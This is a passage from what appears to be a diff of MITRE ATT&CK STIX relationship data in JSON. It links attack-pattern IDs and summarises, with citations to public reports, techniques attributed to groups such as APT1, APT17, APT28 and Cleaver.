"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84", + "relationship_type": "related-to", + "target_ref": 
"attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407" + }, + { + "id": "relationship--a29f2adc-c328-4cf3-9984-2c0c72ec7061", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff", + "relationship_type": "related-to", + "target_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73" + }, + { + "id": "relationship--1143e6a6-deef-4dbd-8c91-7bf537d8f5ce", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b", + "relationship_type": "related-to", + "target_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a" + }, + { + "id": "relationship--ac1dfc58-d5a2-4b6f-9bf4-c6c0d2d3ae80", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--73e7d7d5-1782-4cd0-a4d7-00c7ec051c2a", + "relationship_type": "related-to", + "target_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549" + }, + { + "id": "relationship--614f64d8-c221-4789-b1e1-787e9326a37b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT17](https://attack.mitre.org/groups/G0025) created biographical sections on TechNet profile pages to appear more legitimate.(Citation: FireEye APT17)", + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "relationship_type": "uses", + "target_ref": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201", + "type": "relationship", + "modified": "2019-03-22T14:21:19.541Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--ab356c7a-6922-4143-90eb-5be632e2f6cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) created fake LinkedIn profiles.(Citation: Dell Threat Group 2889)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. 
Retrieved January 14, 2016.", + "source_name": "Dell Threat Group 2889" + } + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--9108e212-1c94-4f8d-be76-1aad9b4c86a4", + "type": "relationship", + "modified": "2019-03-22T20:00:23.846Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--7bd3d2ba-f114-4835-97b6-1c3e2208d3f3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41" + }, + { + "id": "relationship--94daf955-fb3e-4f13-af60-0e3ffa185be0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe", + "relationship_type": "related-to", + "target_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c" + }, + { + "id": "relationship--2b0ec032-eaca-4f0c-be55-39471f0f2bf5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used publicly available privilege escalation tools.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. 
Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "type": "relationship", + "modified": "2019-08-20T13:08:13.337Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--9a1f729c-72a9-4735-9d48-ecb54ea018a9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6", + "relationship_type": "related-to", + "target_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402" + }, + { + "id": "relationship--bc165934-7ef6-4aed-a0d7-81d3372589f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b", + "relationship_type": "related-to", + "target_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077" + }, + { + "id": "relationship--22d4f32c-63c1-400f-8e2c-10e4a200d133", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407", + "relationship_type": "related-to", + "target_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84" + }, + { + 
"id": "relationship--9ad9966d-4a8d-4b15-b503-c5d27104fcdd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c" + }, + { + "id": "relationship--545cd36e-572e-413d-82b9-db65788791f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT17](https://attack.mitre.org/groups/G0025) posted in forum threads and created profile pages in Microsoft TechNet.(Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. 
Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "relationship_type": "uses", + "target_ref": "attack-pattern--9108e212-1c94-4f8d-be76-1aad9b4c86a4", + "type": "relationship", + "modified": "2019-03-22T14:21:19.554Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--715a66b4-7925-40b4-868a-e47aba879f8b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41" + }, + { + "id": "relationship--db4dfa09-7f19-437a-9d79-15f2dc8ba0da", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39", + "relationship_type": "related-to", + "target_ref": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6" + }, + { + "id": "relationship--0e52753e-0a02-4bec-88f9-f8ee21b46bae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "relationship_type": "related-to", + "target_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b" + }, + { + "id": "relationship--be031f72-737b-4afd-b2c1-c565f5ab7369", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a", + "relationship_type": "related-to", + "target_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b" + }, + { + "id": "relationship--2bf984b5-1a48-4d9a-a4f2-e97801254b84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "relationship_type": "related-to", + "target_ref": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11" + }, + { + "id": "relationship--28815a00-1cf4-4fbc-9039-306a9542c7fd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077", + "relationship_type": "related-to", + "target_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b" + }, + { + "id": "relationship--41be9f31-9d2b-44b8-a7dc-31f8c4519751", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6", + "relationship_type": "related-to", + "target_ref": 
"attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39" + }, + { + "id": "relationship--9c44b2ec-70b0-4f5c-800e-426477330658", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c", + "relationship_type": "related-to", + "target_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff" + }, + { + "id": "relationship--4eb0e01c-85ae-466a-a8ff-0cf7891c5ab2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT16](https://attack.mitre.org/groups/G0023) spearphished journalists, apparently targeting those interested in contact information for DPP members or politicians.(Citation: FireEye EPS Awakens Part 2)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. 
Retrieved January 22, 2016.", + "source_name": "FireEye EPS Awakens Part 2" + } + ], + "source_ref": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "relationship_type": "uses", + "target_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549", + "type": "relationship", + "modified": "2019-03-22T14:20:45.708Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--d5bd7a33-a249-46e5-bb19-a498eba42bdb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc" + }, + { + "id": "relationship--3d781e9a-d3f8-4e9f-bb23-ba6c2ff22267", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11", + "relationship_type": "related-to", + "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6" + }, + { + "id": "relationship--9524754d-7743-47b3-8395-3cbfb633c020", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549", + "relationship_type": "related-to", + "target_ref": "attack-pattern--73e7d7d5-1782-4cd0-a4d7-00c7ec051c2a" + }, + { + "id": 
"relationship--689ebb39-52f4-4b2f-8678-72cfed67cb9f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407" + }, + { + "id": "relationship--b180dee5-0d48-448f-94b9-4997f0c584d5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc" + }, + { + "id": "relationship--7aaa32b6-73f3-4b6e-98ae-da16976e6003", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c", + "relationship_type": "related-to", + "target_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73" + }, + { + "id": "relationship--9c87b627-de61-42da-a658-7bdb33358754", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT17](https://attack.mitre.org/groups/G0025) obfuscated infrastructure using a multi-layered malware beaconing approach. 
(Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "relationship_type": "uses", + "target_ref": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39", + "type": "relationship", + "modified": "2019-03-22T14:21:19.564Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--36990d75-9fbd-43f0-9966-ae58f0388e1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41", + "relationship_type": "related-to", + "target_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc" + }, + { + "id": "relationship--2dbdcf5e-af75-4f92-b4ad-942a06aab259", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc" + }, + { + "id": "relationship--87239038-7693-49b3-b595-b828cc2be1ba", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" 
+ ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33", + "relationship_type": "related-to", + "target_ref": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d" + }, + { + "id": "relationship--709bb5af-c484-48f2-bb19-bd7630e42e2d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT28](https://attack.mitre.org/groups/G0007) reused the SOURFACE downloader as the payload of a lure document.(Citation: FireEye APT28)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + } + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "relationship_type": "uses", + "target_ref": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "type": "relationship", + "modified": "2019-09-09T17:44:35.673Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--3d65fc7e-87a5-4113-bd9c-09453fba4d1e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT28](https://attack.mitre.org/groups/G0007) registered domains imitating NATO, OSCE security websites, Caucasus information resources and other organizations.(Citation: FireEye APT28) (Citation: US District Court Indictment GRU Oct 2018)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. 
Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + } + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "relationship_type": "uses", + "target_ref": "attack-pattern--45242287-2964-4a3e-9373-159fad4d8195", + "type": "relationship", + "modified": "2020-10-01T18:55:39.213Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--d26a1746-b577-4a89-be5e-c49611e8c65a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) fake personas included profile photos, details, and network connections.(Citation: Dell Threat Group 2889)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. 
Retrieved January 14, 2016.", + "source_name": "Dell Threat Group 2889" + } + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201", + "type": "relationship", + "modified": "2019-03-22T20:00:23.896Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--66e4da4a-6eb6-46e0-9baf-74059f341b4a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5" + }, + { + "id": "relationship--51c20b46-16cc-4b58-80d7-89d48b14b064", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5", + "relationship_type": "related-to", + "target_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1" + }, + { + "id": "relationship--432c700b-4bf3-4824-a530-a6e86882c4b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73", + "relationship_type": "related-to", + "target_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff" + }, + { + "id": 
"relationship--b09b41c4-670f-4f00-b8d5-a8c6a2dcfcfb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.(Citation: Cylance Cleaver)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + } + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234", + "type": "relationship", + "modified": "2019-03-22T20:00:23.891Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--ad510f42-e745-42d0-8b54-4bf7a2f3cf34", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae", + "relationship_type": "related-to", + "target_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1" + }, + { + "id": "relationship--39db1df8-f786-480c-9faf-5b870de2250b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used third party email services in the registration of whois records.(Citation: Mandiant APT1)", + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "type": "relationship", + "modified": "2019-08-20T13:08:13.437Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--0e7905fd-77c8-43cb-b499-7d6e37fefbeb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used dynamic DNS to register hundreds of FQDNs.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. 
